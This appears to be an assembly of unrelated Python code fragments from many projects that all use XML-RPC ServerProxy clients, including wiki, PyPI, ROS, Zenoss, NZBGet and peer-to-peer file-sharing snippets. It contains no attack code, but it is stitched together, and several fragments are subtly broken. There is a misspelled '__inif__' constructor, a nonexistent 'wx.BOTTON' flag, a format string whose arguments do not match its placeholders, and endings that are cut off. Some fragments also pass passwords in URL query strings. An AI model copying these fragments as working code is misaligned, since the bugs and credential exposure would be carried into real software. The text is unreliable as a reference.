def __init__(self, config, notebook):
    """Connect to a DokuWiki XML-RPC endpoint configured for *notebook*."""
    # Identifier used both as the config section key and the service name.
    self.name = 'DokuWiki'
    self.notebook = notebook
    # Configuration
    # The config entry is a semicolon-separated triple: "url;username;password".
    self.url, username, pwd = config.get(self.name, self.notebook).split(';')
    # NOTE(review): credentials are sent as URL query parameters, so they may
    # end up in proxy/server logs -- confirm this is acceptable.
    ServerProxy.__init__(self, self.url + '/lib/exe/xmlrpc.php?' + urlencode({'u':username, 'p':pwd}))
def getMonitorsConfig(self):
    """ Get monitors configuration from hosts """
    if not self.monitor_hosts:
        return
    # Rebuild the host list: keep hosts that answered (even if they lack the
    # RPC method), drop hosts that were unreachable.
    monitor_hosts = []
    for (name, host, port, desc) in self.monitor_hosts:
        trace("* Getting monitoring config from %s: ..." % name)
        server = ServerProxy("http://%s:%s" % (host, port))
        try:
            config = server.getMonitorsConfig()
            data = []
            for key in config.keys():
                # Each config entry is logged as one XML fragment.
                xml = '<monitorconfig host="%s" key="%s" value="%s" />' % (
                    name, key, config[key])
                data.append(xml)
            self.logr("\n".join(data))
        except Fault:
            # Server is alive but does not expose getMonitorsConfig: keep it.
            trace(' not supported.\n')
            monitor_hosts.append((name, host, port, desc))
        except SocketError:
            # Server is down: silently drop it from the list.
            trace(' failed, server is down.\n')
        else:
            trace(' done.\n')
            monitor_hosts.append((name, host, port, desc))
    self.monitor_hosts = monitor_hosts
def connect(url):
    """Return a ServerProxy for *url*, or None if that server is not alive.

    When url == "auto", pick a live server from CONFIG_FILENAME (shuffled
    for load balancing); exits the process if no configured server responds.
    """
    if url == "auto":  # Not an URL, but a configuration option
        # FIX: use a context manager so the config file handle is closed
        # (the old `file(...)` was never closed).
        with open(CONFIG_FILENAME, "r") as config_file:
            servers = config_file.readlines()
        # Randomize the list for load balancing
        random.shuffle(servers)
        for server in servers:
            # FIX: readlines() keeps the trailing newline, so the previous
            # `server == ""` check never matched blank lines.
            server = server.strip()
            if server == "" or server.startswith("#"):
                continue
            s = connect(server)
            if s is not None:
                return s
        doLog("No server is available!")
        sys.exit(1)
    else:
        url = url.strip("\r").strip("\n")
        s = ServerProxy(url, allow_none=True)
        try:
            status = s.ping()
            doLog("Checking server %s status: %s" %(url, status))
            if status != "[ALIVE]":
                return None
        except Exception:
            # Narrowed from a bare `except:` so Ctrl-C still works.
            doLog("Error:" + str(sys.exc_info()[1]))
            return None
        return s
class Client(wx.App): """ 主Client类,用于设定GUI,启动为文件服务的Node。 """ def __inif__(self, url, dirname, urlfile): """ 创建一个随机的密码,使用这个密码实例化Node。利用Node的_start方法(确保Thread是个无交互的后台程序, 这样他会随着程序退出而退出)启动Thread,读取URL文件中的所有URL,并且将Node介绍给这些URL。 """ super(Client, self).__init__() self.secret = randomString(SECRET_LENGTH) n = Node(url, dirname, self.secret) t = Thread(target=n._start) t.setDaemon(1) t.start() #让服务器先启动。 sleep(HEAD_START) self.server = ServerProxy(url) for line in open(urlfile): line = line.strip() self.server.hello(line) def OnInit(self): """ 设置GUI。创建窗体、文本框和按钮,并且进行布局。将提交按钮绑定到self.fetchHandler上。 """ win = wx.Frame(None, title="File Sharing Client", size=(400,45)) bkg = wx.Panel(win) self.input = input = wx.TextCtrl(bkg) submit = wx.Button(bkg, label="Fetch", size=(80, 25)) submit.Bind(wx.EVT_BUTTON, self.fetchHandler) hbox = wx.BoxSizer() hbox.Add(input, proportion=1, flag=wx.ALL|wx.EXPAND, border=10) hbox.Add(submit, flag=wx.TOP|wx.BOTTON|wx.RIGHT, border=10) vbox = wx.BoxSizer(wx.VERTICAL) vbox.Add(hbox, proportion=0, flag=wx.EXPAND) bkg.SetSizer(vbox) win.Show() return True def fetchHandler(self, event): """ 在用户点击‘Fetch’按钮时调用,读取文本框中的查询,调用服务器Node的fetch方法。 如果查询没有被处理则打印错误信息。 """ query = self.input.getValue() try: self.server.fetch(query, self.secret) except Fault, f: if f.faultCode != UNHANDLED: raise print "Couldn't find the file", query
class Client(Cmd): ''' A text-based client interface. ''' prompt = '>' def __init__(self, url, dirname, urlfile): ''' Initialize the node and start the Node server in a seperate thread. ''' Cmd.__init__(self) self.secret = randomString(SECRET_LENGTH) n = Node(url, dirname, self.secret) t = Thread(target=n._start) t.setDaemon(1) t.start() sleep(HEAD_START) self.server = ServerProxy(url) for line in open(urlfile): self.server.hello(line.strip()) def do_fetch(self, arg): ''' Fetch the specified file. ''' try: self.server.fetch(arg, self.secret) except Fault, f: if f.faultCode !=UNHANDLED: raise print 'Could not find ', arg
def llRemoteData(Channel, Int, String):
    """Forward a remote-data triple to the gateway; return False on RPC errors."""
    payload = {"Channel": Channel, "IntValue": Int, "StringValue": String}
    client = ServerProxy(gateway)
    try:
        return client.llRemoteData(payload)
    except Error:
        return False
def execute(args, parser):
    """Resolve the requested PyPI release and build a package for it."""
    global binstar_upload
    global client
    binstar_upload = args.binstar_upload
    client = ServerProxy(args.pypi_url)
    package = args.pypi_name[0]
    all_versions = args.release != 'latest'
    version = args.release[0] if all_versions else None
    releases = client.package_releases(package, all_versions)
    if not releases:
        sys.exit("Error: PyPI does not have a package named %s" % package)
    if all_versions and version not in releases:
        print(releases)
        print("Warning: PyPI does not have version %s of package %s" % (version, package))
    if not all_versions:
        version = releases[0]
    build_package(package, version)
def setUp(self):
    # Base setup uses the peer0 configuration; this test then spins up two
    # extra peer servers as subprocesses.
    yield base.TestBase.setUp(self, "peer0.conf")
    peering.load_keys()
    # Start peer servers
    cwd = os.path.join(os.getcwd(), "..")
    log.msg("Cleaning peer servers...")
    # Recreate each peer's database from scratch and wait for completion.
    peer1=subprocess.Popen("PYTHONPATH=. scripts/denyhosts-server -c tests/peer1.conf --recreate-database --force > /dev/null 2>&1", cwd=cwd, shell=True)
    peer2=subprocess.Popen("PYTHONPATH=. scripts/denyhosts-server -c tests/peer2.conf --recreate-database --force > /dev/null 2>&1", cwd=cwd, shell=True)
    peer1.wait()
    peer2.wait()
    log.msg("Starting peer servers...")
    # preexec_fn=os.setsid puts each server into its own process group so
    # the whole group can be signalled on teardown.
    self.peer1=subprocess.Popen("PYTHONPATH=. scripts/denyhosts-server -c tests/peer1.conf >/dev/null 2>&1", cwd=cwd, shell=True, preexec_fn=os.setsid)
    self.peer2=subprocess.Popen("PYTHONPATH=. scripts/denyhosts-server -c tests/peer2.conf >/dev/null 2>&1", cwd=cwd, shell=True, preexec_fn=os.setsid)
    log.msg("Waiting until peer servers are responsive...")
    # Poll each peer's XML-RPC endpoint for up to 10 seconds.
    for peer_url in config.peers:
        server = ServerProxy(peer_url)
        is_up = False
        start_time = time.time()
        while not is_up and time.time() - start_time < 10:
            try:
                server.get_new_hosts(time.time(), 1, [], 3600)
                is_up = True
                log.msg("Peer {} is up!".format(peer_url))
            except:
                time.sleep(0.2)
        if not is_up:
            self.fail("Failed to start peer {}".format(peer_url))
def test_listen_port(self):
    """
    The test case to test the server created by NodeSamplerServer class.
    :return:
    """
    def start_server():
        self.node_sampler_server.start()

    # Run the sampler server in a daemon thread so the test process can
    # still exit if the server never stops.
    server_thread = Thread(target=start_server)
    server_thread.setDaemon(True)
    server_thread.start()
    proxy = ServerProxy("http://localhost:8000")
    service_a = Service(name="$$service_a$$", check_methods=TEST_METHOD, ip=TEST_IP)
    service_b = Service(name="$$service_b$$", check_methods=TEST_METHOD, ip=TEST_IP)
    service_c = Service(name="$$service_c$$", check_methods=TEST_METHOD, ip=TEST_IP)
    fake_services = [service_a, service_b, service_c]
    # FIX: assertEquals is a deprecated alias of assertEqual.
    self.assertEqual(
        proxy.sample(fake_services), 1,
        "NodeSamplerServer cannot create object.")
class Client(Cmd): """ Node类的简单的基于文本的界面。 """ prompt = '>' def __init__(self, url, dirname, urlfile): """ 设定url、dirname和urlfile,并且在单独的线程中启动Node服务器。 """ Cmd.__init__(self) self.secret = randomString(SECRET_LENGTH) n = Node(url, dirname, self.secret) t = Thread(target = n._start) t.setDaemon(1) t.start() #让服务器先启动。 sleep(HEAD_START) self.server = ServerProxy(url) for line in open(urlfile): line = line.strip() self.server.hello(line) def do_fetch(self, arg): "调用服务器的fetch方法" try: self.server.fetch(arg, self.secret) except Fault, f: if f.faultCode != UNHANDLED: raise print "Counldn't find the file", arg
class RPC(object): _instance = None def __new__(cls, host): if not cls._instance: cls._instance = object.__new__(cls, host) return cls._instance def __init__(self, host): self.host = host host = "localhost" self.server = ServerProxy("http://%s:%u" % (host, RPC_PORT)) def _close(self): print "stop" self.server.stop() del self.server @classmethod def close(cls): print "close", cls._instance if not cls._instance: return cls._instance._close() cls._instance = None
def sync(self, tracker):
    """Synchronise issues changed since the last run from a Roundup tracker."""
    # use_datetime makes the proxy hand back datetime objects for date values.
    server = ServerProxy(tracker.config, allow_none=True, use_datetime=datetime)
    last_update = DateTime(time.mktime(tracker.last_update.timetuple()))
    users = self._get_users(server)
    # Ids of issues whose activity is newer than the last synchronisation.
    ids = map(int, server.filter('issue', None, {'activity': str(last_update)}))
    for issue_id in ids:
        data = server.display('issue%d' % issue_id, 'title', 'creation',
            'creator', 'assignedto', 'activity', 'messages', 'status')
        issue = Issue.by_tracker_id(tracker.id, issue_id)
        issue.no = issue_id
        issue.set_title(data.get('title', ''))
        issue.set_description(self._get_description(
            server, data.get('messages', [])))
        issue.reporter = users[int(data['creator'])]
        issue.owner = users[int(data['assignedto'])]
        issue.last_change = _roundup_date_to_datetime(data.get('activity'))
        status = int(data.get('status', -1))
        issue.active = status in ACTIVE_STATUS
        issue.tracker = tracker
        if not issue.id:
            # Freshly created local issue: stamp its creation time.
            issue.created = datetime.now()
        issue.updated = datetime.now()
        issue.save()
        post_issue_sync.send(sender=self, issue=issue)
        self._update_user_data(server, data, issue, users)
    # Back-date by one day so updates overlapping this run are not missed.
    tracker.last_update = datetime.now() - timedelta(days=1)
    tracker.save()
    post_tracker_sync.send(sender=self, tracker=tracker)
    return True
def execute(args, parser):
    """Resolve the PyPI package name case-insensitively, then build the
    requested release."""
    global binstar_upload
    global client
    binstar_upload = args.binstar_upload
    client = ServerProxy(args.pypi_url)
    package = args.pypi_name[0]
    all_versions = args.release != 'latest'
    version = args.release[0] if all_versions else None
    # Ask PyPI for the canonical spelling of the package name.
    search = client.search({'name': package})
    if search:
        matches = [entry for entry in search
                   if 'name' in entry and package.lower() == entry['name'].lower()]
        if matches:
            print('Package search: %s' % matches[0])
            package = matches[0]['name']
    releases = client.package_releases(package, all_versions)
    if not releases:
        sys.exit("Error: PyPI does not have a package named %s" % package)
    if all_versions and version not in releases:
        print(releases)
        print("Warning: PyPI does not have version %s of package %s" % (version, package))
    if not all_versions:
        version = releases[0]
    build_package(package, version)
def editDevice(info): Zenoss = {'deviceName': '', 'devicePath': '', 'tag': '', 'serialNumber': '', 'zSnmpCommunity': 'monitor', 'zSnmpPort': '161', 'zSnmpVer': 'v1', 'rackSlot': '0', 'productionState': '1000', 'comments': '', 'hwManufacturer': '', 'hwProductName': '', 'osManufacturer': '', 'osProductName': '', 'locationPath': '', 'groupPaths': '', 'systemPaths': '', 'statusMonitors': '', 'performanceMonitor': '', 'discoverProto': 'snmp', 'priority': '3'} x = 0 for a in info: Zenoss['deviceName'] = info[x][0] url = http(Zenoss['deviceName']) valid = re.search("http", url) if valid: snmp_out = http(url+snmpurl) Zenoss['zSnmpCommunity'] = snmp_out[0] Zenoss['zSnmpVer'] = snmp_out[1] Zenoss['comments'] = "Switch %s\n Hardware %s\n Console %s\n Power %s\n Build Profile %s" % (info[x][2],info[x][3],info[x][4],info[x][5],info[x][6]) sys_match = re.search("\w+", "info[x][8]") if sys_match: Zenoss['systemPaths'] = "/%s" % (info[x][8]) groups_return = http(groupsUrl) Zenoss['groupPaths'] = group_final(groups_return, Zenoss['systemPaths']) serv = ServerProxy (url,allow_none=1) serv.manage_editDevice(Zenoss['tag'], Zenoss['serialNumber'], Zenoss['zSnmpCommunity'], Zenoss['zSnmpPort'], Zenoss['zSnmpVer'], Zenoss['rackSlot'], Zenoss['productionState'], Zenoss['comments'], Zenoss['hwManufacturer'], Zenoss['hwProductName'], Zenoss['osManufacturer'], Zenoss['osProductName'], Zenoss['locationPath'] , Zenoss['groupPaths'], Zenoss['systemPaths']) if verbose: print "%s\n%s\n%s\n%s\n%s\n%s\n" % (url,Zenoss['zSnmpCommunity'],Zenoss['zSnmpVer'],Zenoss['comments'], Zenoss['systemPaths'],Zenoss['groupPaths']) x = x +1
class TriggerServer():
    """Bridges XML-RPC 'get' calls onto a ROS trigger topic."""

    def __init__(self, ip, port, robot_name):
        self._server = Server((ip, port), allow_none=True)
        self._server.register_function(self.get, 'get')
        self._server.register_function(lambda: 'OK', 'ping')
        # Proxy pointing back at our own server; used only to unblock the
        # final handle_request() call during shutdown (see serve()).
        self._sp = ServerProxy("http://%s:%d"%(ip,port))
        self._ros_publisher = rospy.Publisher('/%s/trigger'%robot_name, String, queue_size=10)
        self._stop = False

    # RPC METHOD
    def get(self, data):
        # Republish the RPC payload on the ROS trigger topic.
        self._ros_publisher.publish(String(data=data))

    def serve(self):
        # Handle RPC requests on a background thread while ROS spins here.
        # When rospy.spin() returns (node shutdown), set the stop flag and
        # ping our own server so the blocking handle_request() wakes up.
        thread.start_new_thread(self._serve, ())
        rospy.spin()
        self._stop = True
        self._sp.ping()

    def _serve(self):
        # One request at a time until stop is requested.
        while not self._stop:
            self._server.handle_request()
        rospy.loginfo("Shutting down TriggerServer")
def callable(timezone): try: server = ServerProxy(settings.NIMBUS_MANAGER_URL) server.generate_ntpdate_file_on_cron(timezone.ntp_server) except Exception, error: logger = logging.getLogger(__name__) logger.exception("Conexao com nimbus-manager falhou")
class Client(Cmd): """ A simple text-based interface to the Node class. """ prompt = '> ' def __init__(self, url, dirname, urlfile): """ Sets the url, dirname, and urlfile, and starts the Node Server in a separate thread. """ Cmd.__init__(self) self.secret = randomString(SECRET_LENGTH) n = Node(url, dirname, self.secret) t = Thread(target=n._start) t.setDaemon(1) t.start() # Give the server a head start: sleep(HEAD_START) self.server = ServerProxy(url) for line in open(urlfile): line = line.strip() self.server.hello(line) def do_fetch(self, arg): "Call the fetch method of the Server." try: self.server.fetch(arg, self.secret) except Fault, f: if f.faultCode != UNHANDLED: raise print "Couldn't find the file", arg
def item(request): s = ServerProxy('http://www.upcdatabase.com/xmlrpc') # Gets the ean-code value ean = request.GET.get('ean', '') print ean # Nothing Scanned if (ean == ''): return render_to_response("fms/home.html",script_args) elif (len(ean) == 13 and ean[0]=='0'): # Scanned From Pic-2-Shop App From Mobile Device (Trims leading 0) ean = ean[1:] # elif """query for upc locally""" # Happens when there is a local entry already stored # Redirects to the items page params = { 'rpc_key': rpc_key, 'upc': ean } item_lookup_data = s.lookup(params) print item_lookup_data i_l_d = [] for key, value in item_lookup_data.iteritems(): i_l_d.append((key,value)) script_args['item_lookup_data']= i_l_d return render_to_response("fms/item.html", script_args) return render_to_response("fms/item.html", script_args)
class TestDaemon(TestCase):
    """Integration tests for the daemon's register/unregister/lookup RPC API."""

    def setUp(self):
        # Random high ports to avoid collisions between test runs.
        illuminant_port = random.randrange(10000, 30000)
        daemon_port = random.randrange(10000, 30000)
        self.illuminant_obj = run_illuminant(illuminant_port)
        self.daemon_obj = run_daemon(daemon_port, port_to_uri(illuminant_port))
        self.d = ServerProxy(port_to_uri(daemon_port))
        self.i = ServerProxy(port_to_uri(illuminant_port))
        # Busy-wait until each server has installed its request handler.
        while self.illuminant_obj.handler is None:
            time.sleep(0.01)
        self.illuminant_handler = self.illuminant_obj.handler
        while self.daemon_obj.handler is None:
            time.sleep(0.01)
        # FIX: this previously re-assigned self.illuminant_obj.handler, so
        # the daemon's handler was never captured.
        self.daemon_handler = self.daemon_obj.handler

    def test_Daemon(self):
        # Register one provider, verify the illuminant recorded it, then
        # unregister and check the call succeeded.
        res = self.d.registerService(CALLER_ID, SERVICE, port_to_uri(0), CALLER_API)
        self.assertEqual(res[0], 1)
        records = self.illuminant_handler.records
        self.assertEqual(len(records[SERVICE]), 1)
        res = self.d.unregisterService(CALLER_ID, SERVICE, port_to_uri(0))
        self.assertEqual(res[0], 1)

    def test_LRU(self, times=10):
        # Register `times` providers, then verify repeated lookups rotate
        # through every one of them exactly once.
        for i in range(times):
            self.d.registerService(CALLER_ID, SERVICE, port_to_uri(i), CALLER_API)
        ports = []
        for i in range(times):
            res = self.d.lookupService(CALLER_ID, SERVICE)
            ports.append(uri_to_port(res[2]))
        ports.sort()
        self.assertEqual(ports, list(range(times)))
def _broadcast(self,query,starturl,history):
    """ broadcast to all other nodes """
    mylogger.info('-'*10)
    mylogger.info('[broadcast]:')
    mylogger.info("knows: {0}".format(self.known))
    mylogger.info("history: {0}".format(history))
    # Iterate over a copy so unreachable peers can be removed from
    # self.known while looping.
    for other in self.known.copy():
        mylogger.info('[broadcast]: other is {0}'.format(other))
        # Skip peers that already saw this query to avoid loops.
        if other in history:
            continue
        s = ServerProxy(other)
        mylogger.info('[broadcast]: Connecting from {0} to {1}'.format(self.url,other))
        mylogger.info('*'*80)
        try:
            code,data = s.query(query,starturl,history)
            mylogger.info('[broadcast]: query return code {0}'.format(code))
            if code == SUCCESS:
                # First successful answer wins; stop broadcasting.
                mylogger.info('[broadcast]: query SUCCESS!!!')
                return code,data
            elif code == NOT_EXIST:
                mylogger.info('[broadcast]: query NOT_EXIST!!!')
            else:
                mylogger.info('[broadcast]: query ACCESS_DENIED!!!')
        except Fault, f:
            # connected to server,but method does not exist(Never happen in this example)
            mylogger.warn(f)
            mylogger.warn("[broadcast]:except fault")
        except socket.error, e:
            mylogger.warn("[broadcast]:except socket error")
            mylogger.error('[broadcast]: {0} for {1}'.format(e,other))
            # added by kzl: drop unreachable peers from the known set.
            self.known.remove(other)
    # NOTE(review): falls through with no explicit return (None) when no
    # peer answered successfully -- callers must handle that.
def login(request):
    """ This method lets a user login to pyquiz """
    # Already authenticated with a populated session: straight to the index.
    if unauthenticated_userid(request) != None and 'user' in request.session.keys():
        return HTTPFound(location='/index')
    message = ''
    login = ''
    password = ''
    if 'form.submitted' in request.params:
        username = request.params['login']
        password = request.params['password']
        # Credentials are validated against the schooltool XML-RPC backend.
        server = ServerProxy(serverLocation, transport = trans)
        if server.login(username, password):
            user_info = server.get_user_info(username)
            userinfo = schooltool_login(username, password, user_info)
            request.session['user'] = userinfo
            # The user's first role becomes the remembered auth principal.
            headers = remember(request, userinfo['roles'][0])
            return HTTPFound(location='/index', headers = headers)
        message = 'Failed login'
    # NOTE(review): the submitted password is passed back into the template
    # context below -- confirm this is intentional and not rendered.
    return dict(
        message = message,
        url = request.application_url + '/',
        login = login,
        password = password,
        main = get_renderer('templates/master.pt').implementation(),
        )
def editDevice(cluster, host): Zenoss = {'deviceName': '', 'devicePath': '', 'tag': '', 'serialNumber': '', 'zSnmpCommunity': 'cci-ro', 'zSnmpPort': '161', 'zSnmpVer': 'v2c', 'rackSlot': '0', 'productionState': '1000', 'comments': '', 'hwManufacturer': '', 'hwProductName': '', 'osManufacturer': '', 'osProductName': '', 'locationPath': '', 'groupPaths': '', 'systemPaths': '', 'statusMonitors': '', 'performanceMonitor': '', 'discoverProto': 'snmp', 'priority': '3'} Zenoss['deviceName'] = host Zenoss['systemPaths'] = cluster url = http(Zenoss['deviceName']) valid = re.search("http", url) if valid: snmp_out = http(url+snmpurl) Zenoss['zSnmpCommunity'] = snmp_out[0] Zenoss['zSnmpVer'] = snmp_out[1] sys_match = re.search("\w+", "cluster") if sys_match: Zenoss['systemPaths'] = "/%s" % (cluster) # groups_return = http(groupsUrl) # Zenoss['groupPaths'] = group_final(groups_return, Zenoss['systemPaths']) serv = ServerProxy (url,allow_none=1) serv.manage_editDevice(Zenoss['tag'], Zenoss['serialNumber'], Zenoss['zSnmpCommunity'], Zenoss['zSnmpPort'], Zenoss['zSnmpVer'], Zenoss['rackSlot'], Zenoss['productionState'], Zenoss['comments'], Zenoss['hwManufacturer'], Zenoss['hwProductName'], Zenoss['osManufacturer'], Zenoss['osProductName'], Zenoss['locationPath'] , Zenoss['groupPaths'], Zenoss['systemPaths']) if verbose: print "%s\n%s\n%s\n%s\n%s\n%s\n" % (url,Zenoss['zSnmpCommunity'],Zenoss['zSnmpVer'],Zenoss['comments'], Zenoss['systemPaths'],Zenoss['groupPaths'])
def __init__(self, context):
    """Build an XML-RPC proxy to the document conversion server configured
    in portal preferences."""
    preference_tool = getToolByName(context, 'portal_preferences')
    # Prefer the URL-based preference; fall back to the deprecated
    # address/port pair when no URL is configured.
    uri = getattr(preference_tool, "getPreferredDocumentConversionServerUrl", str)()
    if uri in ('', None):
        address = preference_tool.getPreferredOoodocServerAddress()
        port = preference_tool.getPreferredOoodocServerPortNumber()
        if address in ('', None) or port in ('', None) :
            raise ConversionError('OOoDocument: cannot proceed with conversion:'
                     ' conversion server url is not defined in preferences')
        LOG('OOoDocument', WARNING, 'PreferredOoodocServer{Address,PortNumber}' + \
              ' are DEPRECATED please use PreferredDocumentServerUrl instead',
            error=True)
        scheme = "http"
        uri = 'http://%s:%d' % (address, port)
    else:
        # Derive the transport scheme from the configured URL.
        if uri.startswith("http://"):
            scheme = "http"
        elif uri.startswith("https://"):
            scheme = "https"
        else:
            raise ConversionError('OOoDocument: cannot proceed with conversion:'
                     ' preferred conversion server url is invalid')
    timeout = preference_tool.getPreferredOoodocServerTimeout() \
                  or OOO_SERVER_PROXY_TIMEOUT
    transport = TimeoutTransport(timeout=timeout, scheme=scheme)
    ServerProxy.__init__(self, uri, allow_none=True, transport=transport)
class Client(Cmd): prompt = '>' def __init__(self, url, dirname, urlfile): Cmd.__init__(self) self.secret = randomString(SECRET_LENGTH) n = Node(url, dirname, self.secret) t = Thread(target=n._start) t.setDaemon(1) t.start() sleep(HEAD_START) self.server = ServerProxy(url) for line in open(urlfile): line = line.strip() self.server.hello(line) def do_fetch(self, arg): try: self.server.fetch(arg, self.secret) except Fault as f: if f.faultCode != UNHANDLED: raise print "Couldn't find the file", arg, f def do_exit(self, arg): print sys.exit() do_EOF = do_exit
class Hella(FooApp):
    # FooApp plug-in bridging hellanzb's XML-RPC interface.
    name = 'hella'
    config_opts = {
        'password': '******',
        'server': 'The IP address or hostname running hellanzb',
        'port': 'The port hellanzb is running on. The default is 8760',
    }

    def __init__(self, server=None):
        FooApp.__init__(self, server)
        # NOTE(review): self.data is read here but (re)assigned only on the
        # following line -- this relies on FooApp.__init__ having populated
        # self.data; confirm. Also the URL template has three %-arguments
        # for two %s placeholders ('*****' looks like redacted credentials),
        # which would raise TypeError at runtime -- verify the original.
        self.hellaserver = ServerProxy('http://*****:*****@%s:%s/' % (self.data['password'], self.data['server'], self.data['port']))
        self.data = FileStore('/tmp/apps/hella')
        try:
            self.cache = json.loads(self.data['cache'])
        except:
            # Missing or corrupt cache: start empty.
            self.cache = []

    def send(self, msg):
        # Queue the newzbin id contained in the message text.
        response = self.hellaserver.enqueuenewzbin(int(msg['text']))
        return

    def run(self):
        # Poll hellanzb every 10 seconds and forward log values not yet seen.
        while True:
            status = self.hellaserver.status()
            for entry in status['log_entries']:
                for key, value in entry.items():
                    if not value in self.cache:
                        self.recv('%s: %s' % (self.name, value))
                        self.cache.append(value)
            self.data['cache'] = json.dumps(self.cache)
            sleep(10)
class attk_server(object):
    """Client-side handle for the attack coordination XML-RPC server."""

    def __init__(self, password, url):
        self.id = None
        self.password = password
        self.url = url
        self.xml = ServerProxy(self._make_url())

    def _make_url(self):
        # Embed the password as basic-auth userinfo and append the RPC2 path.
        parts = list(urlsplit(self.url))
        parts[1] = 'x:' + self.password + '@' + parts[1]
        parts[2] = parts[2] + 'RPC2'
        return urlunsplit(parts)

    def ping(self):
        debug('client pinging server')
        return self.xml.ping() == 'pong'

    def finish_attack(self, attack_id, status):
        debug('client finishing attack with server')
        self.xml.finishAttack(attack_id, config.client_id, status)

    def register(self):
        # A False return means registration was rejected; anything else is
        # our assigned client id.
        debug('client registering with server')
        retval = self.xml.registerClient(
            self.password,
            config.client_id,
            config.url,
            config.password,
        )
        if retval is not False:
            self.id = retval
class Graph( object ):
    # Thin client-side wrapper around a pyWebGraph XML-RPC server: a few
    # names are exposed locally, everything else is forwarded to the proxy.

    ADDRESS = "http://127.0.0.1:8000/"
    """The default pyWebGraph XML-RPC server address: `http://127.0.0.1:8000/`"""

    def __init__( self, address = None ):
        if not address:
            address = Graph.ADDRESS
        self.__proxy = ServerProxy( address )
        # Names served locally (as properties/methods) instead of proxied.
        self.__wrapped = [ 'current_node', 'num_nodes', 'node_tos' ]

    def __getattr__( self, name ):
        # NOTE(review): __getattr__ only fires when normal lookup fails, and
        # the names listed in __wrapped resolve normally via the class, so
        # the first branch appears unreachable -- confirm before relying on it.
        if name in self.__wrapped:
            return getattr( self, name )
        else:
            # Unknown attributes become remote XML-RPC method calls.
            return getattr( self.__proxy, name )

    def get_num_nodes( self ):
        return self.__proxy.get_num_nodes()
    num_nodes = property( get_num_nodes )

    def get_current_node( self ):
        return self.__proxy.get_current_node()

    def set_current_node( self, node ):
        return self.__proxy.set_current_node( node )
    current_node = property( get_current_node, set_current_node )

    def node_tos( self, node ):
        # Remote strings arrive as unicode; encode for byte-oriented callers.
        return self.__proxy.node_tos( node ).encode( 'utf8' )
def requestTopic(self, topic):
    """Subscribe to *topic* via the ROS master, then open and hand back a
    connected TCPROS socket to the topic's (single) publisher."""
    code, statusMessage, publishers = self.master.registerSubscriber(
        self.callerId, topic, lookupTopicType(topic)[0], self.callerApi )
    assert code == 1, (code, statusMessage)
    assert len(publishers) == 1, (topic, publishers) # i.e. fails if publisher is not ready now
    print publishers
    # Ask the publisher's XML-RPC slave API for TCPROS connection parameters.
    publisher = ServerProxy(publishers[0])
    code, statusMessage, protocolParams = publisher.requestTopic(self.callerId, topic, [["TCPROS"]])
    assert code == 1, (code, statusMessage)
    assert len(protocolParams) == 3, protocolParams
    print code, statusMessage, protocolParams
    # protocolParams is (protocol, host, port).
    hostPortPair = (protocolParams[1], protocolParams[2])
    soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # TCP
    soc.connect(hostPortPair)
    soc.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
    soc.setblocking(0)
    soc.settimeout(SOCKET_TIMEOUT)
    # TCPROS handshake: a length-prefixed header containing length-prefixed
    # "key=value" fields.
    header = prefix4BytesLen(
        prefix4BytesLen("callerid=" + self.callerId) +
        prefix4BytesLen("topic=" + topic) +
        prefix4BytesLen("type=" + lookupTopicType(topic)[0]) +
        prefix4BytesLen("md5sum=" + lookupTopicType(topic)[1]) +
        "" )
    soc.send(header)
    return soc
def on_task_output(self, task, config):
    """Send each accepted entry's nzb URL to an NZBGet server via XML-RPC."""
    from xmlrpclib import ServerProxy
    params = dict(config)
    server = ServerProxy(params["url"])
    for entry in task.accepted:
        if task.options.test:
            log.info('Would add into nzbget: %s' % entry['title'])
            continue
        # allow overriding the category per entry
        if 'category' in entry:
            params['category'] = entry['category']
        try:
            server.appendurl(entry["title"] + '.nzb', params["category"],
                             params["priority"], params["top"], entry["url"])
            log.info("Added `%s` to nzbget" % entry["title"])
        except Exception:
            # FIX: narrowed from a bare `except:`, which also swallowed
            # KeyboardInterrupt/SystemExit.
            log.critical("rpc call to nzbget failed")
            entry.fail("could not call appendurl via RPC")
def main():
    """Git post-receive hook: report pushed refs to a notification bot."""
    # Connect to the bot's XML-RPC endpoint, authenticated by project token.
    addr_params = XMLRPC_ADDR + (PROJECT_TOKEN, )
    bot = ServerProxy('http://%s:%i/%s/xmlrpc' % addr_params)
    # Repository name is the cwd basename, minus a trailing ".git".
    repo = os.path.basename(os.getcwd())
    if repo.endswith('.git'):
        repo = repo[:-len('.git')]
    messages = []
    # stdin carries one "<old-sha> <new-sha> <refname>" line per updated ref
    # (standard git post-receive hook input).
    for line in sys.stdin:
        (old, new, refname) = line.split()
        if refname.startswith('refs/heads/'):
            refname = refname[len('refs/heads/'):]
        # An all-zero sha means "no commit" (branch created or deleted).
        if new.strip('0'):
            if old.strip('0'):
                # Existing branch updated: report each new revision, oldest first.
                revisions = get_output('git', 'rev-list', '%s..%s' % (old, new)).splitlines()
                for revision in reversed(revisions):
                    msg = format_commit_message(repo, refname, revision)
                    messages.append(msg)
            else:
                messages.append('New branch: %s/%s' % (repo, refname))
                messages.append(
                    format_commit_message(repo, refname, new))
        else:
            messages.append(
                'Branch %s/%s deleted (was: %s)' % (repo, refname, old))
    if messages:
        bot.notify("\n".join(messages))
import os
import stat
import sys

import kaa.webmetadata
import kaa.webmetadata.tv
import kaa.beacon
from xmlrpclib import ServerProxy, Error

# Anonymous login to the OpenSubtitles XML-RPC API at import time; the
# returned token authenticates subsequent calls.
server = ServerProxy("http://api.opensubtitles.org/xml-rpc")
session = server.LogIn("", "", "en", "OS Test User Agent")
token = session["token"]

@kaa.coroutine()
def main():
    """Scan beacon's video database for series lacking a TVDB mapping."""
    kaa.webmetadata.init()
    print 'check for missing tvdb mapping'
    print '------------------------------'
    missing = []
    # NOTE(review): the matching logic below is commented out, so main()
    # currently only prints the header -- confirm whether this is intended
    # or the body was truncated.
    # for alias in (yield kaa.beacon.query(type='video', attr='series')):
    #     if kaa.webmetadata.tv.series(alias):
    #         continue
    #     print 'Missing mapping for "%s"' % alias
    #     print 'Files:'
    #
    #     imdb = None
    #     for item in (yield kaa.beacon.query(type='video', series=alias)):
    #         print '    ', item.filename
    #         result = yield kaa.webmetadata.tv.search(item.filename, item)
    #         if len(result) == 1:
class Hostapd(ConfFile):
    """Robot Framework library that edits a hostapd configuration file and
    drives a remote AP board over XML-RPC.

    *name* is the configuration file; *server_ip*/*server_port* locate the
    XML-RPC server controlling the board.
    """

    # Attributes: mapping of short keys to hostapd.conf directive prefixes.
